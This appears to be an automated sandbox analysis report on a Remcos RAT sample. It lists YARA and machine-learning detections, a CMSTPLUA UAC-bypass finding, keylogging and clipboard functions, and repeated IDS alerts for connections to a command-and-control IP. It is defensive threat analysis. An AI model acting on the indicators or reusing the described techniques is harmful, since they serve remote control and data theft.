              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 39%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
              Source: file.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d76915b8-b

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49716 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49734 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49727 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49760 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49771 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49778 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49795 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49801 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49807 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49819 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49787 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49825 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49713 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49847 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49711 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49856 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49876 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49897 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49842 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49905 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49742 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49915 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49930 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49862 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49920 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49945 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49953 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49937 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49960 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49983 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49998 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49882 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50020 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49754 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50026 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50036 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50037 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50038 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50035 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50046 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50039 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50044 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50052 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50051 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49836 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50043 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50068 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50063 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50048 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50050 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50049 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50074 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50045 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50010 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50073 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50072 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50053 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50032 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50071 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50079 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50060 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50075 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50066 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50077 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50055 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50057 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50062 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50047 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49969 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50069 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50054 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49992 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49977 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50076 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50040 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50065 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50061 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50004 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50078 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50034 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49891 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50033 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49868 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50067 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50064 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50070 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50058 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50041 -> 107.173.4.16:2560
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50059 -> 107.173.4.16:2560
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 107.173.4.16
              Source: global trafficTCP traffic: 192.168.2.6:49711 -> 107.173.4.16:2560
              Source: Joe Sandbox ViewIP Address: 107.173.4.16 107.173.4.16
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.19
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004260F7 recv,12_2_004260F7
              Source: MSBuild.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: file.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: file.exe, 00000000.00000002.2168087268.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, DcBNSgyxoJFip.exe, 00000009.00000002.2200731306.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: file.exe, DcBNSgyxoJFip.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/
              Source: file.exe, DcBNSgyxoJFip.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx$AccountNameRequestphttps://api.libertyreserve.c
              Source: file.exe, DcBNSgyxoJFip.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx%AccountNameRequestqhttps://api.libertyreserve.c
              Source: DcBNSgyxoJFip.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspx
              Source: DcBNSgyxoJFip.exe.0.drString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
              Source: DcBNSgyxoJFip.exe.0.drString found in binary or memory: https://sci.libertyreserve.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
